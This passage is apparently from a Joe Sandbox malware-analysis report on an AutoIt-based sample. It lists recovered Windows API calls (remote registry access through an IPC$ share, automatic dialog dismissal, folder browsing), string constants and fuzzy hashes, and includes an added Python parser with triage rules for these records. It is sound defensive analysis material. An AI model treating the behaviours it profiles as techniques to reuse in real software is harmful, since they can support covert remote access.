                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                    • API String ID: 537147316-1018226102
                                    • Opcode ID: f0c01df9efce1411325a0eec5df52778a256b60e30fbf68eeefc854e2b8c4502
                                    • Instruction ID: 7448d5150a6c63ba04c9fc6f49abd2db67a13cb0b5531409cefea661cda5b68a
                                    • Opcode Fuzzy Hash: f0c01df9efce1411325a0eec5df52778a256b60e30fbf68eeefc854e2b8c4502
                                    • Instruction Fuzzy Hash: 760246711083419FC724EF28C8819AEBBE5FF99314F14492DF49AD72A2EA30D949CB53
                                    APIs
                                    • _memset.LIBCMT ref: 008E2D50
                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 008E2DDD
                                    • GetMenuItemCount.USER32(00945890), ref: 008E2E66
                                    • DeleteMenu.USER32(00945890,00000005,00000000,000000F5,?,?), ref: 008E2EF6
                                    • DeleteMenu.USER32(00945890,00000004,00000000), ref: 008E2EFE
                                    • DeleteMenu.USER32(00945890,00000006,00000000), ref: 008E2F06
                                    • DeleteMenu.USER32(00945890,00000003,00000000), ref: 008E2F0E
                                    • GetMenuItemCount.USER32(00945890), ref: 008E2F16
                                    • SetMenuItemInfoW.USER32(00945890,00000004,00000000,00000030), ref: 008E2F4C
                                    • GetCursorPos.USER32(?), ref: 008E2F56
                                    • SetForegroundWindow.USER32(00000000), ref: 008E2F5F
                                    • TrackPopupMenuEx.USER32(00945890,00000000,?,00000000,00000000,00000000), ref: 008E2F72
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008E2F7E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                    • String ID:
                                    • API String ID: 3993528054-0
                                    • Opcode ID: ab67d67d4ba4679fd1756a1aa4dc61c2c1f86c78dda18a4511e77823f922edc4
                                    • Instruction ID: b303a2fbcb1d92a0f0677ebe89320c024a5811d96148ea30ccf9c5db486b1577
                                    • Opcode Fuzzy Hash: ab67d67d4ba4679fd1756a1aa4dc61c2c1f86c78dda18a4511e77823f922edc4
                                    • Instruction Fuzzy Hash: B871D37160429ABEEB318F5ADC45FAABF6CFB06324F100216F625E61E1CBB15C10D791
                                    APIs
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    • _memset.LIBCMT ref: 008D786B
                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008D78A0
                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008D78BC
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008D78D8
                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008D7902
                                    • CLSIDFromString.COMBASE(?,?), ref: 008D792A
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008D7935
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008D793A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                    • API String ID: 1411258926-22481851
                                    • Opcode ID: 95624f722d5a880562c3f16cab7ac2cfcc61c5a240cd800f23ded1604b866509
                                    • Instruction ID: 9d6836795aced9da806d493c38cf241987dff56541e480bc330b6ccded5b43b0
                                    • Opcode Fuzzy Hash: 95624f722d5a880562c3f16cab7ac2cfcc61c5a240cd800f23ded1604b866509
                                    • Instruction Fuzzy Hash: 23410872C1422DABCF21EBA8DC95DEDBB78FF14314F44452AE905E3261EA309E05DB91
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,008FFDAD,?,?), ref: 00900E31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 3964851224-909552448
                                    • Opcode ID: 26398485953f2b2b9679c1f71bb8643f62c03b24c1c5dd9a472d74ada13d65a6
                                    • Instruction ID: ae6369d6440c087b64310bd589dae73d87f8cfe4a82a28d5663e40c2d520e258
                                    • Opcode Fuzzy Hash: 26398485953f2b2b9679c1f71bb8643f62c03b24c1c5dd9a472d74ada13d65a6
                                    • Instruction Fuzzy Hash: 3D419C3210032A8FDF20EF14D856BEE37A4FF52300F140424FD559B692EB74A91ADB61
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008BE2A0,00000010,?,Bad directive syntax error,0090F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 008DF7C2
                                    • LoadStringW.USER32(00000000,?,008BE2A0,00000010), ref: 008DF7C9
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    • _wprintf.LIBCMT ref: 008DF7FC
                                    • __swprintf.LIBCMT ref: 008DF81E
                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 008DF88D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                    • API String ID: 1506413516-4153970271
                                    • Opcode ID: 3c8fce7426fc4c2c4f54584fe5322b9e677830d48c749bda241eb34ab47cb2a5
                                    • Instruction ID: 9cfba07962b95eaf6477a6edb5be8129d35ce1ebf686d2b67bb90eb73e895b6d
                                    • Opcode Fuzzy Hash: 3c8fce7426fc4c2c4f54584fe5322b9e677830d48c749bda241eb34ab47cb2a5
                                    • Instruction Fuzzy Hash: C5216F3290421EEFCF11EF94CC5AEEE7B39FF14304F040466F515A61A2DA719618EB52
                                    APIs
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                      • Part of subcall function 00887924: _memmove.LIBCMT ref: 008879AD
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008E5330
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008E5346
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008E5357
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008E5369
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008E537A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: SendString$_memmove
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 2279737902-1007645807
                                    • Opcode ID: a746d7e554d8e6959d35c5a5c7f3adb24958de1af6fc69ccda624b32dea141dd
                                    • Instruction ID: f862b61870a10f52a44db00aefecc867b21ee86342ef58783be76c9e916c80c4
                                    • Opcode Fuzzy Hash: a746d7e554d8e6959d35c5a5c7f3adb24958de1af6fc69ccda624b32dea141dd
                                    • Instruction Fuzzy Hash: A4118261A5026979D720B666CC4ADFFBB7CFBD2B4CF100429B812E21D1EEA05D04CAA1
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                    • String ID: 0.0.0.0
                                    • API String ID: 208665112-3771769585
                                    • Opcode ID: dcf3114569d4e94d6f2e164908ca7dd1b1d850cf354f6e9e6a4de07b80ee1688
                                    • Instruction ID: a4383375c0bfee802da4fd16cd86ae109c182864a4aee16f8bfd3dde3d8f593a
                                    • Opcode Fuzzy Hash: dcf3114569d4e94d6f2e164908ca7dd1b1d850cf354f6e9e6a4de07b80ee1688
                                    • Instruction Fuzzy Hash: 7611273150411CAFDB20AB399C4AEDA77BCFF43315F0041B6F84AD6491EF718A819A92
                                    APIs
                                    • timeGetTime.WINMM ref: 008E4F7A
                                      • Part of subcall function 008A049F: timeGetTime.WINMM(?,75C0B400,00890E7B), ref: 008A04A3
                                    • Sleep.KERNEL32(0000000A), ref: 008E4FA6
                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 008E4FCA
                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008E4FEC
                                    • SetActiveWindow.USER32 ref: 008E500B
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008E5019
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 008E5038
                                    • Sleep.KERNEL32(000000FA), ref: 008E5043
                                    • IsWindow.USER32 ref: 008E504F
                                    • EndDialog.USER32(00000000), ref: 008E5060
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    • Opcode ID: 8be531eee528d0c4b709ec810eef9d0acc4d0b0301ef891de59d1b1aa2caeb99
                                    • Instruction ID: 85c45bc21eac727ca51499beb1387088ede8d38e562bdd19f31dda5b9f7fefaa
                                    • Opcode Fuzzy Hash: 8be531eee528d0c4b709ec810eef9d0acc4d0b0301ef891de59d1b1aa2caeb99
                                    • Instruction Fuzzy Hash: 33219FB862CB44AFE7209F61EC98E663B69FB47749F041024F115C25B1CBA18E50FA62
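                                     The function records on this page are machine-generated, and the interesting content (which APIs a function calls, with what recovered arguments, and which string constants sit next to them) is buried in free text. The following Python is an added example, not code from Joe Sandbox or from the sample: it parses records in exactly the "APIs / Strings / Similarity" layout used above into structured objects, resolves a handful of constants the report leaves as raw hex (registry root handles, KEY_READ, the BM_CLICK and WM_CLOSE message numbers), and runs two triage rules over the API sets. The sample input is excerpted from the two records above (the WNetAddConnection2W / RegConnectRegistryW / CLSIDFromString function and the EnumThreadWindows / FindWindowExW "BUTTON" function), trimmed to the fields the parser reads. The rules, the constant tables and the function names are my own assumptions; the first rule is my reading that a `\IPC$` connection followed by a remote-registry CLSID lookup is the path AutoIt's ObjCreate takes when it is given a server name, which the report itself does not state.

```python
"""Parse Joe Sandbox per-function records into structured data and run a few
triage rules over the recovered API calls. Added example; not Joe Sandbox code.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Two records excerpted from the report (trimmed to the fields read below).
# Constructed input for this example.
SAMPLE = r"""
APIs
  • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
• _memset.LIBCMT ref: 008D786B
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008D78A0
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008D78BC
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008D78D8
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008D7902
• CLSIDFromString.COMBASE(?,?), ref: 008D792A
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008D7935
Strings
Memory Dump Source
• Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1411258926-22481851
• Instruction Fuzzy Hash: 23410872C1422DABCF21EBA8DC95DEDBB78FF14314F44452AE905E3261EA309E05DB91
APIs
• timeGetTime.WINMM ref: 008E4F7A
• Sleep.KERNEL32(0000000A), ref: 008E4FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 008E4FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008E4FEC
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008E5019
• SendMessageW.USER32(00000010,00000000,00000000), ref: 008E5038
• EndDialog.USER32(00000000), ref: 008E5060
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Instruction Fuzzy Hash: 33219FB862CB44AFE7209F61EC98E663B69FB47749F041024F115C25B1CBA18E50FA62
"""

# "[Part of subcall function X: ]Name.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$"
)
FIELDS = {"Source File", "API ID", "String ID", "API String ID", "Opcode ID",
          "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str          # call-site address inside the dumped image
    caller: str = ""  # set for "Part of subcall function X" lines

@dataclass
class FuncRecord:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

    def api_names(self) -> set[str]:
        return {c.name for c in self.calls}

def parse_records(text: str) -> list[FuncRecord]:
    records: list[FuncRecord] = []
    rec = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":              # every record opens with this header
            rec = FuncRecord()
            records.append(rec)
            continue
        if rec is None or not line:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            rec.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"] or ""))
            continue
        key, sep, value = line.partition(": ")
        if sep and key in FIELDS:
            rec.fields[key] = value
            if key == "String ID":
                # The report joins strings with "$", which is also a legal character
                # in share names ("\IPC$"): that trailing "$" is lost here and
                # cannot be recovered from this format.
                rec.strings = [s for s in value.split("$") if s]
    return records

# Constants worth resolving (assumed table). The report lists only the arguments
# it recovered (compare the two SendMessageW lines), so values are matched
# anywhere in the argument list rather than by position.
KNOWN = {
    "RegConnectRegistryW": {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
                            "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"},
    "RegOpenKeyExW": {"00020019": "KEY_READ"},
    "SendMessageW": {"000000F5": "BM_CLICK", "00000010": "WM_CLOSE"},
}

def annotate(rec: FuncRecord) -> list[tuple[str, str]]:
    """Return (api, resolved constant) pairs for a record."""
    return [(c.name, KNOWN[c.name][a]) for c in rec.calls if c.name in KNOWN
            for a in c.args if a in KNOWN[c.name]]

# Hypothetical triage rules: every API in the set must occur in one record.
RULES = {
    "remote CLSID lookup via IPC$ share (WNetAddConnection2W + RegConnectRegistryW + CLSIDFromString)":
        {"WNetAddConnection2W", "RegConnectRegistryW", "CLSIDFromString"},
    "dialog auto-dismiss (EnumThreadWindows + FindWindowExW + SendMessageW)":
        {"EnumThreadWindows", "FindWindowExW", "SendMessageW"},
}

def triage(records: list[FuncRecord]) -> list[tuple[int, str]]:
    return [(i, label) for i, rec in enumerate(records)
            for label, needed in RULES.items() if needed <= rec.api_names()]

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for i, r in enumerate(recs):
        print(f"record {i}: {len(r.calls)} calls, strings={r.strings}, "
              f"api-string-id={r.fields.get('API String ID')}")
        for api, label in annotate(r):
            print(f"  {api}: {label}")
    for i, label in triage(recs):
        print(f"record {i} matches: {label}")
```

                                     Pivoting across reports is easiest on the `API String ID` and `Instruction Fuzzy Hash` fields the parser keeps, since those are what the report's own "Similarity" section is built from; the resolved constants are what turn `SendMessageW(...,000000F5,...)` into "click the first BUTTON child, then WM_CLOSE" at a glance.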
                                    APIs
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • CoInitialize.OLE32(00000000), ref: 008ED5EA
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008ED67D
                                    • SHGetDesktopFolder.SHELL32(?), ref: 008ED691
                                    • CoCreateInstance.COMBASE(00912D7C,00000000,00000001,00938C1C,?), ref: 008ED6DD
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008ED74C
                                    • CoTaskMemFree.COMBASE(?), ref: 008ED7A4
                                    • _memset.LIBCMT ref: 008ED7E1
                                    • SHBrowseForFolderW.SHELL32(?), ref: 008ED81D
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008ED840
                                    • CoTaskMemFree.COMBASE(00000000), ref: 008ED847
                                    • CoTaskMemFree.COMBASE(00000000), ref: 008ED87E
                                    • CoUninitialize.COMBASE ref: 008ED880
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                    • String ID:
                                    • API String ID: 1246142700-0
                                    • Opcode ID: 492521f06657f017226859b246a88748813b02829ff4546f667ec388a2eec563
                                    • Instruction ID: 4bf6fd2d3f7b920b5831339ec0155302da003739d0e939ec3406573ccc22f499
                                    • Opcode Fuzzy Hash: 492521f06657f017226859b246a88748813b02829ff4546f667ec388a2eec563
                                    • Instruction Fuzzy Hash: 06B12D75A00219AFDB14DFA9C884DAEBBB9FF49314F048469F809DB261DB30ED45CB51
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 008DC283
                                    • GetWindowRect.USER32(00000000,?), ref: 008DC295
                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 008DC2F3
                                    • GetDlgItem.USER32(?,00000002), ref: 008DC2FE
                                    • GetWindowRect.USER32(00000000,?), ref: 008DC310
                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 008DC364
                                    • GetDlgItem.USER32(?,000003E9), ref: 008DC372
                                    • GetWindowRect.USER32(00000000,?), ref: 008DC383
                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 008DC3C6
                                    • GetDlgItem.USER32(?,000003EA), ref: 008DC3D4
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008DC3F1
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 008DC3FE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    • Opcode ID: 1a1fe1a0d3725c498a07189863cbf42e26cedfdc02dc440debdec74f1eda72e1
                                    • Instruction ID: a75a6eb7e8f3dc62cb28702568a3cbf1315846267be3e317152e4838159b5411
                                    • Opcode Fuzzy Hash: 1a1fe1a0d3725c498a07189863cbf42e26cedfdc02dc440debdec74f1eda72e1
                                    • Instruction Fuzzy Hash: FF511171B10205AFDB18CFA9DD99A6EBBBAFB88711F148129F515D7390D7719D00CB10
                                    APIs
                                      • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                    • GetSysColor.USER32(0000000F), ref: 008821D3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    • Opcode ID: c3a97d0c74d25adbf9b32b3d0aa35863134563974d34c020795b16b1d51a2563
